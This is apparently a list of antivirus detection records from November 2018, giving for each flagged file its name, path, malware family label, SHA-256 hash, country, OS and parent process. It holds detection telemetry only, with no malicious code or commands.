  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:07:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='allplan_start.exe', filepath='C:\\adobeTemp\\ETRB7B1.tmp\\1\\universal\\Professional\\Support Files\\Plug-ins\\MAXON CINEWARE AE\\(CINEWARE Support)\\bin\\resource\\modules\\objects\\allplan_start.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='53e544ffea2aebbfec094fdb22d1ad7d7d5c8f7fc0efee4ec1660eb1d65fe448', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-04T17:56:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='arles papa juin 2014 .exe', filepath='C:\\Users\\X\\Documents\\Arles papa_031118\\Arles Papa Juin 2014\\Arles Papa Juin 2014 .exe', filesize=512000, name='TR/Patched.Ren.Gen.#M300.#R2969'), hash='036452ed8e9dd37d84f2d04db5df92a1ddce21ed9c1a21eefa84709bebbd5bc5', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:02:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134222-91017164', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a355024a\\AVSCAN-20181104-133518-5ADA0135\\AVSCAN-20181104-134222-91017164', filesize=384000, name='HEUR/AGEN.1019667.#M1.#R1'), hash='db409efa1d81672e39f5b20ee17dde503757c0823cd4c1c53ff60cc69f1d0599', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:29:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msetres.dll', filepath='D:\\ip2770\\win\\RES\\MESSAGE\\Arabic\\MSetRes.Dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='7f3771d972e0cf876bf4b95757d8731ddfcea92a6fd5a5661a4ab19d821a9550', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T01:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d2b584b488db933f9db5eb2f27ca8f5f0881ce0fc9b7fe6dcb89ae14bdb73f9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\D2B584B488DB933F9DB5EB2F27CA8F5F0881CE0FC9B7FE6DCB89AE14BDB73F9F', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='d2b584b488db933f9db5eb2f27ca8f5f0881ce0fc9b7fe6dcb89ae14bdb73f9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-02T11:32:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='cda92e757df684af2753995308be5dae0c29d539587e336e7754bbd560a89fb6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultraiso.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\UltraISO.exe", filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eularesde_de.dll', filepath='D:\\soft\\Adobe photoshop cs2\\AutoPlay\\eularesde_DE.dll', filesize=156000, name='W32/Ramnit.C.#M0.#R0'), hash='a11438dab887556005154755508239756d448b40f3903566fc6c4083ba12ec55', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='services_update.exe', filepath='\\\\?\\C:\\ProgramData\\{25223bbe-9f73-6cee-6300-dde5d073b7f3}\\services_update.exe', filesize=256000, name='TR/GandCrab.azw.#M1.#R1'), hash='be1266832073b4407deef4ee688b42074a40042b4a11e2eb61fc8a1ba42d0e98', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:56:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b9a7d2cb9aa9746fb901ce9880f9012940afc8180e306e03be6fb49e771e6af2.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B9A7D2CB9AA9746FB901CE9880F9012940AFC8180E306E03BE6FB49E771E6AF2.VIR', filesize=192000, name='X2000M/Agent.6489234.#M1.#R1'), hash='b9a7d2cb9aa9746fb901ce9880f9012940afc8180e306e03be6fb49e771e6af2', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:54:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:00:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qnajoju.exe', filepath='c:\\users\\X\\appdata\\roaming\\qnajoju.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T15:35:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nladminpro.exe', filepath='\\\\?\\E:\\Programas1\\Network.LookOut.Administrator.Professional.v2.6.7\\Crack\\NLAdminPro.exe', filesize=640000, name='W32/Neshta.A.#M1.#R1'), hash='d10c6f13c24d5a4fb4b478bda9f08b4387ad4e770b72db3cb2b1c007d90108a5', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='b57f63d98e7751525abc028e3d1339fdb186251ce1e42e890bd1d1cf2be8165f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:51:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avisynth.dll', filepath='C:\\Program Files\\FreeTime\\FormatFactory\\FFModules\\Encoder\\avisynth.dll', filesize=620000, name='W32/Ramnit.C.#M0.#R0'), hash='d18eeca092c7f342d63c2cf9587e4d384db6233fb90f0a84962bd154ab27fa23', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658daf', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658daf', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='8468c3203db279591d6f3ca70d715214b3a8402c2e75c2b8753a53e0fdbd65a0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='googleupdatehelper.dll', filepath='C:\\Program Files\\Google\\Chrome\\Application\\GoogleUpdateHelper.dll', filesize=704000, name='TR/ExtenBro.uhnh.#M1.#R1'), hash='eb0268652038b73dcfa960a5587943a7849aa6536598baae774baa4d2299b1d3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:22:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='anytrans 703 crack code full version 2018.exe', filepath='G:\\ANYTRANS 703 CRACK CODE FULL VERSION 2018.EXE', filesize=2944000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='ea0f711f478b41a0d61d30e4c67f69bd5f3b69dd334dd9b3bd835deac9a63812', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:15:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='feedingfrenzy.exe', filepath='F:\\العاب 2020\\السمكة\\feedingfrenzy.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='ba5e72dce950e02a1b78eaf24656e3f1b8b87c208306e3ebd5d5edc3f5c570a5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T19:02:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b9cf355948929bb8721772d523ac0abb1b485d84063e82e7107f02d177eedba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B9CF355948929BB8721772D523AC0ABB1B485D84063E82E7107F02D177EEDBA', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='8b9cf355948929bb8721772d523ac0abb1b485d84063e82e7107f02d177eedba', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:02:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101850-d127ad2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_573a0902\\AVSCAN-20181102-081308-6BB2B467\\AVSCAN-20181102-101850-D127AD2F', filesize=384000, name='TR/Crypt.XPACK.279549.#M1.#R1'), hash='bcbd5418fcf362b739fb4aa91f7a5a82aa472e6edbd0b97c99f22a6c8f9bf97d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0yg3pndpr5x\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deforming.exe', filepath='C:\\Program Files (x86)\\Deforming\\Deforming.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='efbb5dc8bb09c6875770d4b43e51aeb97a5b6ff29d81333e8266736432b4b95a', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:fnPXdsV6mU2L9sUu.1', country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:05:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='download.exe', filepath='C:\\Users\\X\\Downloads\\Download.exe', filesize=1216000, name='ADWARE/MultiPlug.Gen4.#M300.#R300014'), hash='b53086de3bb22b58a3108b387fa01acb8fdaa70c2b22d5a56836513255247ec5', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T16:49:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ymm_prec.dll', filepath='C:\\CYPE Ingenieros\\Versión 2012\\programas\\ymm_prec.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='f2eae9276ff97445e62b76e75a6f91db7c3b8797e9bd673b03c661d0f16cb6ea', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:31:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zemax.exe', filepath='\\\\?\\C:\\Program Files\\Zemax\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:30:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131744-30c77035', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131744-30C77035', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134206-0652da9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-133815-EB71C4B2\\AVSCAN-20181102-134206-0652DA9B', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111524-cc3b519b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-111524-CC3B519B', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='fb35cffc8d58a245c149d5f9dbc29144a86ba1116cd3730149a53ad860d63cbe', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:17:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='beetle.exe', filepath='o:\\افلام عربي2016\\كونترا\\العاب2016\\صيد البقر\\سباق سيارات 1\\BEETLE.EXE', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='df7989e7c4a75f779832ea28653bba7189c797bb6aeafcb1216c730e17d228ac', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:00:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143635-b79d06c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79cabe45\\AVSCAN-20181102-143553-B053454F\\AVSCAN-20181102-143635-B79D06C1', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-104528-75d086e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_62c1c742\\AVSCAN-20181104-104402-6BDFBD1B\\AVSCAN-20181104-104528-75D086E3', filesize=1024000, name='Adware/CsdiMonetize.dxckt.#M1.#R1'), hash='ce7558dac4c120340a90ea7e57498f2e5b5d40aa5f3ed1ee6c161bdfcd1b8009', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:45:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239ecd', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239ecd', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:50:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a747', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a747', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:00:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blankandsecure.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\BlankAndSecure.exe', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='label_84884476.doc', filepath='C:\\TMP\\01\\_virs\\label_84884476.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='fb467c5ef6a5a7ce1db165b458c64aff8d5ca5e813712201abe7d73a7b0048b7', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:33:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d8bd68c7815d2ae8dd798b2e768f67b3488a566aa997eb176b4dbde96cadd1cd', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T22:36:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsa7C15.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-04T23:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091632-16d614a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091632-16D614A7', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00237dbb', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00237dbb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:14:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gykoyceeieigc4yqcas i42sye8kgqa.86giywg8cccwcmgameqqm2ig6e0gmiawqyqa8ai2cygqqece', filepath='M:\\\xa0\\gyKOYCeEIEIGC4yqcaS i42sYE8Kgqa.86GiyWG8CCCwcmGAMeqQm2IG6e0GMiawQyqA8aI2cyGQQEcE', filesize=21640000, name='TR/Crypt.ZPACK.Gen7.#M300.#R604114'), hash='f40739ac93c0367aa824d6cd248da015517dc35e9142602ab7283cfc3d5c15ae', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:28:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:54:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-23-004641/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T03:47:27Z'), dt=datetime.date(2018, 11, 4)),
